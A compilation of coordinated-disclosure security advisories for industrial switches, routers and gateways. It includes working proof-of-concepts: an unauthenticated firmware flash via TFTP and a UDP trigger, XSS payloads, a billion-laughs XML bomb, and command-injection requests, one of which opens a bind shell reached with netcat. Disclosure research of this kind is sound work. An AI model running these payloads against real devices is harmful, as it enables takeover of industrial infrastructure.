Korenix JetNet series is prone to a unauthenticated firmware upgrade, which leads to remote code execution.

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines […]. Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. […]”

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Tested on emulated Korenix JetNet 5310G / v2.6

All vulnerable models/versions according to vendor:
JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3)
JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3, 4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3, 4508f-sw V2.3)
JetNet 5620G-4C V1.1
JetNet 5612GP-4F V1.2
JetNet 5612G-4F V1.2
JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0)
JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0, 6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0)
JetNet 6628XP-4F-US V1.1
JetNet 6628X-4F-EU V1.0
JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1)
JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0, 6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0, 6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0)
JetNet 6910G-M12 HVDC V1.0
JetNet 7310G-V2 2.0
JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0, 7628XP-4F-EU V1.1
JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0
JetNet 7714G-M12 HVDC V1.0

1) TFTP Without Authentication (CVE-2023-5376)
The available tftp service is accessable without user authentication. This allows the user to upload and download files to the restricted “/home” folder.

2) Unauthenticated Firmware Upgrade (CVE-2023-5347)
A critical security vulnerability has been identified that may allow an unauthenticated attacker to compromise the integrity of a device or cause a denial of service (DoS) condition. This vulnerability resides in the firmware upgrade process of the affected system.

The Linux tftp client was used to upload a firmware to the absolute path “/home/firmware.bin”:

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

class FirmwarePart:
def init(self, name, offset, size):
self.name = name
self.offset = offset
self.size = size

firmware_parts = [
FirmwarePart(“uimage_header”, 0x0, 0x40),
FirmwarePart(“uimage_kernel”, 0x40, 0x3c54),
FirmwarePart(“gzip”, 0x3c94, 0x14a000 – 0x3c94),
FirmwarePart(“squashfs”, 0x14a000, 0x539000 – 0x14a000),
FirmwarePart(“metadata”, 0x539000, 5480448 – 0x539000),
]

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int32_t check_file(const char* arg1) {
FILE* r0 = fopen(arg1, “rb”);

if (!r0) {
return 0xffffffff;
}

int32_t filechecksum = 0;
int32_t last_data_size = 0;
int32_t file_size = 0;
uint8_t data_buf[4096];
int32_t data_len = 1;

while (data_len > 0) {
data_len = fread(data_buf, 1, sizeof(data_buf), r0);

if (data_len == 0) {
break;
}

int32_t counter = 0;
while (counter < (data_len >> 2)) {
int32_t byte_at_counter = *((int32_t*)(data_buf + (counter << 2)));
counter++;
filechecksum += byte_at_counter;
}

file_size += data_len;
last_data_size = data_len;
}

fclose(r0);

if (last_data_size < 0x400 || (last_data_size >= 0x400 && (file_size – 0x14a
000) > 0x5ac000)) {
return 0xffffffff;
}

data_len = 0;
while (data_len < (last_data_size >> 2)) {
int32_t r3_2 = *((int32_t*)(data_buf + (data_len << 2)));
data_len++;
filechecksum -= r3_2;
}

return filechecksum;
}

int main(int argc, char* argv[]) {
if (argc != 2) {
printf(“Usage: %s <file_path>\n”, argv[0]);
return 1;
}

int32_t result = check_file(argv[1]);
printf(“0x%x\n”, result);

return 0;
}

# tftp $IP
tftp> put exploit.bin /home/firmware.bin
Sent 5520766 bytes in 5.7 seconds

# echo -e “\x00\x00\x00\x1f\x00\x00\x00\x01\x01” | nc -u $IP 5010

Jan 1 00:01:00 Jan 1 00:01:00 syslog: UDP cmd is received
Jan 1 00:01:00 Jan 1 00:01:00 syslog: management vlan = sw0.0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: setsockopt(SO_BINDTODEVICE) No such devi
Jan 1 00:01:00 Jan 1 00:01:00 syslog: tlv_count = 0
Jan 1 00:01:00 Jan 1 00:01:00 syslog: rec_bytes = 10
Jan 1 00:01:00 Jan 1 00:01:00 syslog: command TLV_FW_UPGRADE received
check firmware…
checksum=b2256313, inFileChecksum=b2256313
Firmware upgrading, don’t turn off the switch!
Begin erasing flash:
.
Write firmware.bin (5480448 Bytes) to flash:
…
Write finished…
Terminating child processes…
Jan 1 00:01:01 Jan 1 00:01:01 syslog: first time create tlv_chain
Jan 1 00:01:01 syslogd exiting
Firmware upgrade success!!
waiting for reboot command …….

Beijer/Korenix provided a workaround to mitigate the vulnerabilities until a proper patch is available (see “Workaround” section).

Beijer representatives provided the following workaround for mitigating the
vulnerabilities on devices of the JetNet series:

Login by terminal:

Switch# configure terminal

Switch(config)# service ipscan disable

Switch(config)# tftpd disable

Switch(config)# copy running-config startup-config

Source: https://www.beijerelectronics.com/en/support/Help___online?docId=69947

This commands should be used to deactivate the TFTP daemon on the device to
prevent unauthenticated actors from abusing the service.

Regardless to the current state of the vulnerability, CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.

• 31-08-2023: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
• 31-08-2023: Receiving contact information. Send vulnerability information.
• 26-09-2023: Asking about vulnerability status and receiving update release date.
• 27-10-2023: Received update from contact regarding the firmware update.
• 29-11-2023: Meeting with contact stating that it effects the whole series.
• 31-11-2023: Meeting to discuss potential solutions.
• 11-12-2023: Release delayed due to lack of workaround from manufacturer.
• 21-12-2023: Manufacturer provides workaround. Release date confirmed.
• 09-01-2024: Coordinated release of security advisory.

Phoenix Contact TC Cloud Client, TC Router & Cloud Client are prone to a Stored Cross-Site Scripting (XSS) and Billion laughs attack.

At Phoenix Contact, our approach is innovative, sustainable, and based on partnership. This applies to how we deal with employees as well as with our customers. We are also conscious of our social and environmental responsibility and we act accordingly. With the vision of the All Electric Society, we also want to empower our customers to act more sustainably by enabling the comprehensive electrification, networking, and automation of all sectors of the economy and infrastructure with our products and solutions.

Source: https://www.phoenixcontact.com/en-us/ueber-uns

TC Router 3002T-4G* / <2.0.2
TC Cloud Client 1002-4G* / <2.07.2
Cloud Client 1101T-TX/TX / <2.06.10

1) Reflected Cross-Site Scripting (XSS) CVE-2023-3526
A reflected cross-site scripting vulnerability can be triggerd in the license viewer of the device. This can be used to execute malicious code in the context of a user’s browser. Cookies may be also stoled via this way.

2) Excessive Memory Consumption (Billion Laughts Attack) CVE-2023-3569
By abusing the configuration file upload functionality of the device, it is possible to slow down all other processes.

The reflected cross-site scripting vulnerability can be triggered by using the following GET request:

https://$IP/cgi-bin/p/license?pkg=netsnmp&txt=15″><script>alert(“document.cookie”)</script>

The following configuration file can be used to exploit the binary

“/usr/bin/xmlconfig”, which supportes entity reference nodes:
===============================================================================
<?xml version=”1.0″?>
<!DOCTYPE lolz [
<!ENTITY lol “lol”>
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 “&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;”>
<!ENTITY lol2
“&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;”>
<!ENTITY lol3
“&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;”>
<!ENTITY lol4
“&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;”>
<!ENTITY lol5
“&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;”>
<!ENTITY lol6
“&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;”>
<!ENTITY lol7
“&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;”>
<!ENTITY lol8
“&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;”>
<!ENTITY lol9
“&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;”>
]>
<lolz>&lol9;</lolz>
===============================================================================

Update to the latest available firmware version.

None.

CyberDanube recommends Phoenix Contact customers to upgrade the firmware to the latest version available.

• 2023-05-16: Contacting vendor via psirt@phoenixcontact.com
• 2023-05-17: Vendor informed internal product team.
• 2023-05-18: Added responsible disclosure policy from St. Poelten UAS.
• 2023-05-19: Vendor needs more time to fix the issues.
• 2023-06-15: Vendor asked for an explaination of the issues as he cannot reproduce them; Sent screenshots and more PoCs to the vendor.
  Offered an MS Teams call to clarify the issues.
• 2023-06-16: Scheduled a call for 2023-06-19.
• 2023-06-19: Clarified issues and further timeline for the coordination. Vendor proposed to release the firmware on 2023-07-13.
• 2023-07-04: Contact stated that he has to shift the release after July. It will be released on 08.08.2023; Confirmed the date.
• 2023-07-13: Received CVE numbers from vendor.
• 2023-07-18: Received firmware versions from vendor.
• 2023-07-23:_Vendor released firmwares.
• 2023-08-08: Coordinated release of security advisory.

Advantech EKI-1524/1522/1521 devices are prone to multiple Stored Cross-Site Scripting (XSS).

“Advantech’s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.”

Source: https://www.advantech.com/en/about

EKI-1524-CE series / 1.21 (CVE-2023-4202)
EKI-1522-CE series / 1.21 (CVE-2023-4202)
EKI-1521-CE series / 1.21 (CVE-2023-4202)
EKI-1524-CE series / 1.24 (CVE-2023-4203)
EKI-1522-CE series / 1.24 (CVE-2023-4203)
EKI-1521-CE series / 1.24 (CVE-2023-4203)

1) Stored Cross-Site Scripting (XSS) (CVE-2023-4202, CVE-2023-4203)
Two stored cross-site scripting vulnerabilities has been identified in the firmware of the device. The first XSS was identified in the “Device Name” field and the second XSS was found in the “Ping” tool. This can be exploited in the context of a victim’s session.

Both cross-site scripting vulnerabilities are permanently affecting the device.

The first vulnerability can be triggerd by setting the device name
(“System->Device Name”) to the following value:

“><script>alert(“document.cookie”)</script>

This code prints out the cached cookies to the screen.

http://$IP/cgi-bin/ping.sh?random_num=2013&ip=172.16.0.141%3b%20<script>alert(1)</script>&size=56&count=1&interface=eth0&_=1682793104513

Upgrade to the newest available firmware.

None.

CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.

• 2023-05-16: Contacting vendor via security contact.
• 2023-05-24: Contact stated that issue 1.1) is solved after firmware v1.21.
  The contact is trying to reproduce issue 1.2; Gave advice to reproduce issue.
• 2023-05-25: Contact stated that new firmware should resolve the issue.
• 2023-06-03: Sent new payload to the vendor.
• 2023-06-05: Vendor asked for clarification; Sent further explaination to the contact; Vendor contact said he knows a solution.
• 2023-06-22: Asked for an update; Contact stated that the beta firmware should resolve the issues.
• 2023-06-27: Asked for the release date.
• 2023-07-04: Contact stated, that they are currently doing QA tests.
• 2023-07-06: Asked if issue 1.1 is really resolved to be released; Vendor stated that it can be published.
• 2023-07-17: Assigned CVE numbers for the issues. Asked for an update.
• 2023-07-18: Vendor contact stated that the firmware will be released end of July.
• 2023-08-07: Asked contact for the new firmware version.
• 2023-08-08: Received version 1.26 as the official released firmware with fixes.
  Coordinated release of security advisory.

Advantech EKI-1524/1522/1521 devices are prone to authenticated command injections and a buffer overflow vulnerability. These vulnerabilities can be used to execute arbitrary commands on OS level.

“Advantech’s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence.”

Source: https://www.advantech.com/en/about

EKI-1524-CE series / 1.21
EKI-1522-CE series / 1.21
EKI-1521-CE series / 1.21

1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574)
The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors.

2) Buffer Overflow (CVE-2023-2575)
The web server is prone to a buffer overflow, triggered due to missing input lenght validation in the NTP input field. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked.

The web server is prone to two authenticated command injections via POST parameters. The following proof-of-concepts show how to inject commands to the system which gets executed with root permissions in the background.

The following POST request executes the command “;ping 10.0.0.1” on the system:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

It is also possible to execute this command without any interceptor proxy by enclose it with “;”, which results in the string “;ping 10.0.0.1;”.

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 823
Origin: http://172.16.0.97
Connection: close
Referer: http://172.16.0.97/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaa […] aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa […]
&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

/ # *** Error in `./index.cgi’: free(): invalid next size (normal): 0x00069828 ***
*** Error in `./index.cgi’: malloc(): memory corruption: 0x00069898 ***

/ # ps
PID USER COMMAND
[…]
935 root ./index.cgi func=setsys
959 root ./index.cgi func=setsys
983 root ./index.cgi func=setsys
[…]

Update the product to the latest available firmware version.

None

CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.

• 2023-03-08: Contacting Advantech via Service Request form; No answer.
• 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendor responded that EKI-1524/1522/1521 series are affected.
• 2023-03-20: Asked for status update.
• 2023-03-21: Vendor responded that the firwmare is currently under testing.
• 2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor.
• 2023-04-01: Vendor asked multiple question.
• 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10.
• 2023-04-10: Clarified further issues.
• 2023-04-23: Vendor sent notification that a beta release of the firmware is available.
• 2023-05-02: Vendor sent notification that a new firwmare release is online.
• 2023-05-04: Asked vendor if the advisory can be published earlier than agreed.
• 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed.
• 2023-05-11: Coordinated release of security advisory.

Multiple JetWave products from Korenix are prone to command injection and denial of service (DoS) vulnerabilities.

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.
[…]
Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, andTransportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners.”

Source:
https://www.korenix.com/en/about/index.aspx?kind=3

The following firmware versions have been found to be vulnerable by CyberDanube:

• Korenix JetWave4221 HP-E <= V1.3.0
• Korenix JetWave 3220/3420 V3 < V1.7

The following firmware versions have been identified to be vulnerable by the vendor:

• Korenix JetWave 2212G V1.3.T
• Korenix JetWave 2212X/2112S V1.3.0
• Korenix JetWave 2211C < V1.6
• Korenix JetWave 2411/2111 < V1.5
• Korenix JetWave 2411L/2111L < V1.6
• Korenix JetWave 2414/2114 < V1.4
• Korenix JetWave 2424 < V1.3
• Korenix JetWave 2460 < V1.6

1) Authenticated Command Injection (CVE-2023-23294, CVE-2023-23295)
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

2) Authenticated Denial of Web-Service (CVE-2023-23296)
When logged in, a user can issue a POST request such that the underlying binary exits. The Web-Service becomes unavailable and cannot be accessed until the device gets rebooted.

1.a) – CVE-2023-23294
The command “touch /tmp/poc” was injected to the system by using the following
POST request:

POST /goform/formTFTPLoadSave HTTP/1.1
Host: 172.16.0.38
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Origin: http://172.16.0.38
Connection: close
Referer: http://172.16.0.38/mgmtsaveconf.asp
Cookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45
Upgrade-Insecure-Requests: 1

submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit

The command gets executed as root and a file under the folder /tmp/ is created.

1.b) – CVE-2023-23295
The command “touch /tmp/poc2” was injected to the system by using the following POST request:

POST /goform/formSysCmd HTTP/1.1
Host: 172.16.0.38
Content-Type: application/x-www-form-urlencoded
Connection: close
Referer: 172.16.0.38
Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb
Content-Length: 40

sysCmd=touch%20/tmp/poc2&submit-url=

POST /goform/formDefault HTTP/1.1
Host: 172.16.0.38
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://172.16.0.38
Connection: close
Referer: http://172.16.0.38/toolping.asp
Cookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356
Upgrade-Insecure-Requests: 1

PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping

rm: invalid option — /
BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary
Usage: rm [OPTION]… FILE…

Remove (unlink) the FILE(s). You may use ‘–‘ to
indicate that all following arguments are non-options.

Options:
-i always prompt before removing each destination
-f remove existing destinations, never prompt
-r or -R remove the contents of directories recursively

killall: wlwatchdog: no process killed
killall: wlapwatchdog: no process killed

Owner of these products are suggested to update to the following versions:

• Korenix JetWave 4221 HP-E V1.4.0
• Korenix JetWave 2212G V1.10
• Korenix JetWave 2212X/2112S V1.11
• Korenix JetWave 2211C V1.6
• Korenix JetWave 2411/2111 V1.5
• Korenix JetWave 2411L/2111L V1.6
• Korenix JetWave 2414/2114 V1.4
• Korenix JetWave 2424 V1.3
• Korenix JetWave 2460 V1.6
• Korenix JetWave 3220/3420 V3 V1.7

None

CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.

• 2022-12-05: Contacting Beijer Electronics Group via cs@beijerelectronics.com
• 2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by the vendor. The vendor planned to fix the vulnerabilities in the next 1.5 months.
• 2023-01-04: Contact shared the updated firmware version. CyberDanube checked if the vulnerabilities got fixed. The contact communicated that
  not only JetWave4221 is vulnerable to these issues. Therefore, CyberDanube postponed the release of the Advisory until the other
  products have been patched.
• 2023-01-30: Meeting with Beijer Electronics. Customer get informed about the issues. Fixes got published. Disclosure date got shifted to 2023-02-13 to provide a time-window for patching.
• 2023-02-13: Coordinated release of security advisory.

Delta Electronics DVW-W02W2-E2 is prone to an authenticated command injection vulnerability. This vulnerability can be used to execute arbitrary commands on the device.

“Delta, founded in 1971, is a global provider of power and thermal management solutions. Its mission statement, “To provide innovative, clean and energy -efficient solutions for a better tomorrow,” focuses on addressing key environmental issues such as global climate change. As an energy-saving solutions provider with core competencies in power electronics and automation, Delta’s business categories include Power Electronics, Automation, and Infrastructure.”

Source: https://www.deltaww.com/en-US/about/aboutProfile

DVW-W02W2-E2 / V2.42

1) Authenticated Command Injection
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

The web server is prone to an authenticated command injection via POST parameters. This is only possible if the “timestamp” parameter is set correctly in the URL. The following proof-of-concept shows how to open a port binding shell on port 8889 with a “utelnetd” listener:

POST /apply.cgi?/MT_ping.htm%20timestamp=$correct-timestamp$ HTTP/1.1
Host: 192.168.3.148
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
Origin: http://192.168.3.148
Connection: close
Referer: http://192.168.3.148/MT_ping.htm
Cookie: xxid=1973719449
Upgrade-Insecure-Requests: 1

submit_flag=mt_ping&hid_ver1=&hid_ser1=&hid_comm1=&hid_ver2=&hid_ser2=&hid_comm2=&destination=`utelnetd%20-p%208889%20-l%20/bin/ash%20-d`

For accessing the device, the command “netcat” can be used:

$ nc 192.168.3.150 8889
��
��!��
��

BusyBox v1.4.2 (2016-08-18 22:45:41 EDT) Built-in shell (ash)
Enter ‘help’ for a list of built-in commands.

/ #

Update to firmware version V2.5.2.

None

CyberDanube recommends Delta Electronics customers to upgrade the firmware to the latest version available.

• 2022-08-02: Contacting Delta Electronics.
• 2022-08-10: Vendor requested the advisory without encryption; Sent advisory to Delta Electronics.
• 2022-08-16: Security contact asked few questions regarding responsible disclosure; Sent answers.
• 2022-08-30: Asked for an update.
• 2022-09-01: Vendor responded, that they will need more time to resolve the issues; Provided additional 30 days (until 2022-11-02) for patching.
• 2022-10-11: Asked for an update.
• 2022-10-12: Vendor responded, that fixing will be done 2022-11-15; Shifted release date to this date.
• 2022-10-16: Vendor shifted release date again to 2022-11-18. Shifted advisory release date to the same day.
• 2022-10-17: Asked for an update regarding the release; No answer.
• 2022-10-18: Asked for an update and shifted release date to 2022-10-22.
• 2022-10-19: Vendor responded, that there were problems at releasing the patch. Contact stated, that the patch will delay until end of November.
• 2022-10-21: Asked vendor for a concrete release date; No answer.
• 2022-10-28: Announced advisory release date for 2022-10-30 to vendor.
• 2022-10-29: Found firmware patches with issue date 2022-11-25 on vendors website.
• 2022-10-30: Vendor confirmed fixes. Coordinated release of security advisory.

Delta Electronics DX-2100-L1-CN is prone to authenticated command injection and a stored cross-site scripting (XSS) vulnerability. The XSS vulnerability can be used to execute arbitrary commands in the context of a user’s browser. The command injection allows an attacker to execute system commands on the device itself.

“Delta, founded in 1971, is a global provider of power and thermal management solutions. Its mission statement, “To provide innovative, clean and energy -efficient solutions for a better tomorrow,” focuses on addressing key environmental issues such as global climate change. As an energy-saving solutions provider with core competencies in power electronics and automation, Delta’s business categories include Power Electronics, Automation, and Infrastructure.”

Source: https://www.deltaww.com/en-US/about/aboutProfile

DX-2100-L1-CN / V1.5.0.10

1) Authenticated Command Injection (CVE-2022-42140)
An authenticated command injection has been identified in the web configuration service of the device. It can be used to execute system commands on the OS from the device in the context of the user “root”. Therefore, a full compromization of the device is possible by having credentials for the web service only.

2) Stored Cross-Site Scripting (CVE-2022-42141)
A stored cross-site scripting vulnerability has been identified in the function “net diagnosis” on the device’s web configuration service. This can be exploited in the context of a victim’s session.

The parameter “diagnose_address” contains the payload “;ls /;”, which basically prints the content of the root directory to the serial terminal of the device.

http://192.168.3.150/lform/net_diagnose?action=diagnose&diagnose_type=0&diagnose_address=;ls%20/;

The output can be seen in the context of a virtualized firmware clone, as used to find this vulnerability, but is usually invisible to a customer. Therefore, a more visible payload may be commands that interact via the network, like “;ping 192.168.0.10;”. This command will ping a device on the corresponding IP address within the local network.

POST /lform/urlfilter?action=save HTTP/1.1
Host: 192.168.3.150
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
Connection: keep-alive
Cookie: language=en_US; userindex=1; loginexpire=1648630746607; session=30

lan_ipaddr=192.168.5.5&lan_netmask=255.255.255.0&src_addr_start=&src_addr_end=&editnum=0&bfilter_urllist=0&url_addr=<script>alert(document.cookie)</script>&src_addr_type=0&filter_state=1

Update to firmware version V1.5.0.12.

None

CyberDanube recommends Delta Electronics customers to upgrade the firmware to the latest version available.

• 2022-08-02: Contacting Delta Electronics.
• 2022-08-10: Vendor requested the advisory without encryption; Sent advisory to Delta Electronics.
• 2022-08-16: Security contact asked few questions regarding responsible disclosure; Sent answers.
• 2022-08-30: Asked for an update.
• 2022-09-01: Vendor responded, that they will need more time to resolve the issues; Provided additional 30 days (until 2022-11-02) for patching.
• 2022-10-11: Asked for an update.
• 2022-10-12: Vendor responded, that fixing will be done 2022-11-15; Shifted release date to this date.
• 2022-10-16: Vendor shifted release date again to 2022-11-18. Shifted advisory release date to the same day.
• 2022-10-17: Asked for an update regarding the release; No answer.
• 2022-10-18: Asked for an update and shifted release date to 2022-10-22.
• 2022-10-19: Vendor responded, that there were problems at releasing the patch. Contact stated, that the patch will delay until end of November.
• 2022-10-21: Asked vendor for a concrete release date; No answer.
• 2022-10-28: Announced advisory release date for 2022-10-30 to vendor.
• 2022-10-29: Found firmware patches with issue date 2022-11-25 on vendors website.
• 2022-10-30: Vendor confirmed fixes. Coordinated release of security advisory.

Hirschmann BAT-C2 is prone to an authenticated command injection vulnerability. This vulnerability can be used to execute arbitrary commands on the device.

“The Technology and Market Leader in Industrial Networking. Hirschmann develops innovative solutions, which are geared towards its customers’ requirements in terms of performance, efficiency and investment reliability.”

Source: https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtml

Hirschmann (Belden) BAT-C2

1) Authenticated Command Injection
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

The command “ping 192.168.1.1” was injected to the system by using the following POST request:

POST / HTTP/1.1
Host: 192.168.3.150
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
